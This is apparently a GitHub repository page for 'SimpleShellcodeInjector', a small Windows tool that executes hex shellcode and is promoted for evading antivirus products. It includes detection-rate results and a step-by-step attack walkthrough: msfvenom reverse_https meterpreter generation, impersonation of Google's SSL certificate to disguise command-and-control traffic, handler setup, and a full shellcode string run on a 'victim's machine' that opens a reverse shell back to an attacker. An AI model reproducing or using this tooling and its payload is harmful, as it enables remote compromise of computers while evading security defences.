Skip to content
SimpleShellcodeInjector receives as an argument a shellcode in hex and executes it. It DOES NOT inject the shellcode in a third party application.
Branch: master
Clone or download
DimopoulosElias Cobalt Strike on Defender Threat Definition Version 1.291.2365.0 (20/…

Antivirus Status:
Version Created 20/04/2019 10:23 AM
Threat Definition Version 1.291.2365.0

Windows Version:
Windows 10 Version 1809 (OS Build 17763.437)
Latest commit 9a2b5fd Apr 20, 2019
Type Name Latest commit message Commit time
Failed to load latest commit information.
OLDBinary Updated Results from (0/26) Apr 20, 2019
SimpleShellcodeInjector.c Fix memory allocation Apr 20, 2019
ssi VS Defender.mkv Cobalt Strike on Defender Threat Definition Version 1.291.2365.0 (20/… Apr 20, 2019
video demonstration.mkv Video demonstration Aug 21, 2018

SimpleShellcodeInjector (SSI)



SimpleShellcodeInjector or SSI receives as an argument a shellcode in hex and executes it. It DOES NOT inject the shellcode in a third party application and it stays under the radar for tools like Get-InjectedThread.
At the moment, many antivirus solutions will not detect it, even when you execute a meterpreter's shellcode, without obfuscation.
Let me note that, although you can use SSI in order to recieve a meterpreter, it is NOT a stager for metasploit. It just executes the shellcode you feed it.

Antivirus Detection (Rate: 0/30)

Actively Tested

At the moment, it has been actively tested against the following solutions (default settings - fully updated) and it returned a reverse meterpreter with success:

  • Windows Defender
  • Symantec Endpoint Protection
  • Kaspersky
  • ESET - Smart Security Premium (trial version)

Victim's OS: Windows 10 64 bit



Detection rate (0/26)

Scan Date: 20-04-2019 20:00:38

d-Aware Antivirus: Clean

AhnLab V3 Internet Security: Clean

Alyac Internet Security: Clean

Avast: Clean

AVG: Clean

Avira: Clean

BitDefender: Clean

BullGuard: Clean

ClamAV: Clean

Comodo Antivirus: Clean

DrWeb: Clean

Emsisoft: Clean

Eset NOD32: Clean

Fortinet: Clean

F-Secure: Clean


Kaspersky: Clean

McAfee: Clean

Malwarebytes: Clean

Panda Antivirus: Clean

Sophos: Clean

Trend Micro Internet Security: Clean

Webroot SecureAnywhere: Clean

Windows 10 Defender: Clean

Zone Alarm: Clean

Zillya: Clean

Example Usage

A reverse https meterpreter example is being provided below. However, you can use any shellcode you like.

Important Note: Although some security solutions like Windows Defender do not detect the SSI as a virus, they can detect other factors which are not related to the SSI.For example they might detect metasploit's default certificate or the reverse tcp meterpreter.

Attacker's Machine: Generate payload for SSI:

$ i686-w64-mingw32-gcc SimpleShellcodeInjector.c -o ssi.exe
$ msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=443 -f c -o msf.txt
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 545 bytes
Final size of c file: 2315 bytes
Saved as: msf.txt

$ cat msf.txt|grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"


Prepare Metasploit - SSL impersonation:

$ msfconsole
msf exploit(multi/handler) > use auxiliary/gather/impersonate_ssl
msf auxiliary(gather/impersonate_ssl) > set RHOST
sf auxiliary(gather/impersonate_ssl) > run

[*] - Connecting to
[*] - Copying certificate from
/C=US/ST=California/L=Mountain View/O=Google LLC/ 
[*] - Beginning export of certificate files
[*] - Creating looted key/crt/pem files for
[+] - key: /home/gweeperx/.msf4/loot/
[+] - crt: /home/gweeperx/.msf4/loot/
[+] - pem: /home/gweeperx/.msf4/loot/
[*] Auxiliary module execution completed

Prepare Metasploit - Handler:

msf auxiliary(gather/impersonate_ssl) > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(multi/handler) > set HandlerSSLCert /home/gweeperx/.msf4/loot/
HandlerSSLCert => /home/gweeperx/.msf4/loot/
msf exploit(multi/handler) > set LHOST
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 

Victim's Machine:

C:\Users\gweeperx\Desktop>ssi.exe fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d686e6574006877696e6954684c772607ffd531db5353535353683a5679a7ffd553536a03535368bb010000e81a0100002f303430705247463070385f53396450306959436451676264466553636e6c4346787333785a4e4a4a355072346d6430634b6f68366e64374d634973644b4239646249463958534c3435325f76456c74785472556452644b6e77447275547762767630794b5069796d544c726751395f2d326e7a626f30336530527255346848664961694a6f644f634a00506857899fc6ffd589c653680032e08453535357535668eb552e3bffd5966a0a5f688033000089e06a04506a1f566875469e86ffd55353535356682d06187bffd585c0751468881300006844f035e0ffd54f75cde84a0000006a4068001000006800004000536858a453e5ffd593535389e7576800200000535668129689e2ffd585c074cf8b0701c385c075e558c35fe86bffffff31302e31302e3131332e32303800bbf0b5a2566a0053ffd5
 +-+-+-+ +-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+
 |S|S|I| |(|S|i|m|p|l|e| |S|h|e|l|l|c|o|d|e| |I|n|j|e|c|t|o|r|)|
 +-+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+
 |b|y| |g|w|e|e|p|e|r|x|
 +-+-+ +-+-+-+-+-+-+-+-+

Ready? Go!
  • Note: I am hiding the cmd window, so you will see not output from the SSI*

Enjoy your shell.


I tried to make it as simple as i could, in hope that it will be easy for anyone to make a few changes in the code and avoid AV signatures which will arise after the release of this tool.

DON'T forget to wear your white hat before you use it. ;-)

You can’t perform that action at this time.